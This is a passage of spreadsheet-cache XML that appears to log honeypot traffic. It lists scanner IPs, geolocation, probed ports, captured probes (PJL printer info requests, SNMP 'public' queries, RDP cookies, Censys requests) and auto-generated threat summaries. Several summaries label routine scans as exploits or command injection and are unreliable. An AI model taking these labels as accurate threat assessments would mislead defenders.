185.247.137.81:5060;branch=z9hG4bKfvhjjgjr;received=185.247.137.81;rport=42061'}}&amp;&amp;{Data_IRC:{'command': 'FOX.VERSION=S:1.0', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': 'ID=I:1', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': '};;', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:b9f7:8951"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="The data suggests a request to retrieve the version of an IRC service, which could be a reconnaissance attempt by a malicious actor. This might be an initial scan or probing for vulnerabilities in the service. The actor may be attempting to identify potential entry points for further exploitation. &amp;&amp; The attacker is likely attempting to identify the version of a service running on the system by sending a query for the version number. This could be a reconnaissance step before launching a more targeted attack. The request appears to be sent in an attempt to determine if the service matches certain criteria. &amp;&amp; Possible malicious activity: A suspicious command was issued with an ID of 1, which may indicate an attacker attempting to authenticate or gather information. The empty parameters suggest a potential attempt to exploit the service for further actions. This could be an initial phase of a larger attack. &amp;&amp; This log entry indicates that an unknown client attempted to connect to the service, sending an identification command without any parameters, suggesting a reconnaissance or probing attempt. The client is seeking information about the server, which could be a precursor to more malicious activity. This behavior is likely indicative of a scanning or probing action. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No malicious activity detected. &amp;&amp; The log indicates an attempt to access Microsoft SQL Server without specifying database credentials, potentially an indication of a brute-force attack or unauthorized access attempt. This can be a malicious activity as it may be used for database exploitation. It suggests the attacker is trying to find unsecured databases to gain unauthorized access."/>
    <s v="IRCBot &amp;&amp; IRCScan &amp;&amp; IRC Scan &amp;&amp; IRC Attack &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="68"/>
    <x v="68"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:53:24"/>
    <d v="2025-04-30T20:53:24"/>
    <d v="2025-04-30T20:53:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Karnal"/>
    <s v="Nīsang"/>
    <s v="1261279"/>
    <s v="NA"/>
    <s v="29.6923"/>
    <s v="76.7546"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:85b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="69"/>
    <x v="69"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:41:43"/>
    <d v="2023-12-03T09:03:00"/>
    <d v="2025-04-30T20:41:43"/>
    <n v="343"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_MYSQL_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;62366&amp;&amp;161&amp;&amp;5432&amp;&amp;6379&amp;&amp;143&amp;&amp;445&amp;&amp;1433&amp;&amp;389&amp;&amp;5900&amp;&amp;33007&amp;&amp;3306&amp;&amp;3389&amp;&amp;21&amp;&amp;53762&amp;&amp;110&amp;&amp;8443&amp;&amp;9100&amp;&amp;80&amp;&amp;1521&amp;&amp;55699&amp;&amp;55109&amp;&amp;23&amp;&amp;51571"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RkSHszSFg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GmjXLE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JmFHVl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JNLUrbaZj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XkjmGh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iINQpE'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hrWzLrpBF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hmngoO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OeFDAc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qcUVvbiGP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KzGJZQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=myVznu'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=emBdHw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kwQrpN'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f93"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Potential printing abuse or hacking attempt through printer control, where an unauthorized command is sent to the device. The command appears to be retrieving information about the device. This could be a reconnaissance step by an attacker. &amp;&amp; Possible malicious activity involves a remote printer management exploit, where an attacker is sending a fake administrative command to gain unauthorized access and control over the system's printers or print services. This could be used for eavesdropping on sensitive data or spreading malware through print jobs. The attack may also allow attackers to disrupt normal printing operations. &amp;&amp; Possible malicious activity involves sending unauthorized printer control commands, potentially for exploitation or unauthorized print jobs. This could be an attempt to take control of a printer system. Data is being manipulated with printer-specific commands. &amp;&amp; Possible malicious activity is an attempt to retrieve printer information, possibly as part of a reconnaissance or exploitation effort. This could be a prelude to unauthorized access or further attacks on the system. The command suggests a targeted attack on printing services. &amp;&amp; The presence of this log entry suggests a possible attempt to extract printer information, likely for malicious purposes such as exploiting vulnerabilities or gathering sensitive data about the system's internal workings. This could be part of a larger reconnaissance effort by an attacker. The extracted information may then be used to inform further attacks. &amp;&amp; Possible malicious activity is a printer exploitation attempt, where an attacker sends a command to gather printer information. The command appears to be specific to a particular type of printer driver. This could be the first step in further attacks on the network. &amp;&amp; Malicious entity attempting to exploit printer functionality for unauthorized access or data retrieval through a specific command. _x000a_This is an indication of potential print job tampering or information gathering activity. _x000a_Possible attempt to inject malicious code or commands into the printer system. &amp;&amp; The data indicates an attempt to send a printer identification request, which is unusual and may be a probing or reconnaissance activity by an attacker. This could be a prelude to further malicious activities such as exploitation of vulnerabilities in the printer or adjacent systems. The attacker is gathering information about the target system. &amp;&amp; Malicious party attempting to send printer job control commands, possibly probing for vulnerabilities or testing unauthorized access._x000a_ Command sent to print server appears suspicious and could be a reconnaissance attempt._x000a_ Printer job control language used inappropriately, indicating potential security risk. &amp;&amp; Possible malicious activity is unauthorized printer command execution, likely an attempt to exploit printer functionality for malicious purposes, possibly for reconnaissance or further attack. The attacker may be trying to gather information about the system's configuration or capabilities. This could be a sign of a targeted print-based vulnerability exploitation. &amp;&amp; Malicious actor is attempting to execute a command on a printer, likely for unauthorized access or control. This indicates a potential print server exploitation attempt. Command injection attack is underway. &amp;&amp; Malicious actor attempting to gather printer information by sending a specific command to potentially exploit sensitive data or manipulate device settings. This may be a reconnaissance attempt for further exploitation. Printer access could be abused for unauthorized purposes. &amp;&amp; Possible malicious activity: Unauthorized printer commands being sent, likely attempting to print or gain access to device settings. This could be part of a larger attack targeting networked printers or printing infrastructure. Attempting to gather information about the device's configuration or capabilities. &amp;&amp; Possible malicious printer spooling activity detected, attempting to manipulate printer settings or inject malicious code through a print job. This may be an attempt to exploit a vulnerability for unauthorized access or data exfiltration. Printer settings manipulation could lead to further security risks. &amp;&amp; A malicious script is attempting to gather printer information, potentially as part of a larger attack. This could be an attempt to exploit unpatched vulnerabilities or scan for sensitive information. It may also indicate a broader reconnaissance effort. &amp;&amp; Malicious activity involves attempting to execute a printer command, potentially for unauthorized access or data manipulation via a remote connection. This behavior may be indicative of an attack aimed at exploiting printer functionality for malicious purposes. The attacker is trying to extract information from the system using this printer command."/>
    <s v="Printer Attack &amp;&amp; Port Jiggering Attack &amp;&amp; Port Sniffing &amp;&amp; PortScan &amp;&amp; Scanning probe &amp;&amp; Printer Exploit &amp;&amp; Printer Exploit &amp;&amp; PortScan &amp;&amp; Port Scan &amp;&amp; Printer Scanning &amp;&amp; Printer Hack. &amp;&amp; Printer Hack &amp;&amp; Printer Exploit &amp;&amp; PortScan"/>
  </r>
  <r>
    <x v="70"/>
    <x v="70"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:27:16"/>
    <d v="2024-04-06T02:52:00"/>
    <d v="2025-04-30T20:27:16"/>
    <n v="674"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_IRC_H3&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_SMTP_H34&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_IPP_H9&amp;&amp;SMA-LAB_IPP_H46&amp;&amp;SMA-LAB_IPP_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_SIP_H21&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_RDP_H30&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_IPP_H19&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;3306&amp;&amp;21&amp;&amp;23&amp;&amp;6379&amp;&amp;NA&amp;&amp;6667&amp;&amp;110&amp;&amp;443&amp;&amp;25&amp;&amp;5432&amp;&amp;1080&amp;&amp;1521&amp;&amp;3389&amp;&amp;1433&amp;&amp;22&amp;&amp;28664&amp;&amp;5900&amp;&amp;631&amp;&amp;9100&amp;&amp;8443&amp;&amp;143&amp;&amp;389&amp;&amp;80&amp;&amp;123&amp;&amp;36338&amp;&amp;36348&amp;&amp;45354&amp;&amp;40131&amp;&amp;47156&amp;&amp;44538&amp;&amp;44554"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']}"/>
    <n v="78"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;request&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=42159'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,51916)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.21.98:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=45925'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=56403'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=38455'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_NTP:{'mode': '3', 'version': '3'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,46708)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,50860)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=47458'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 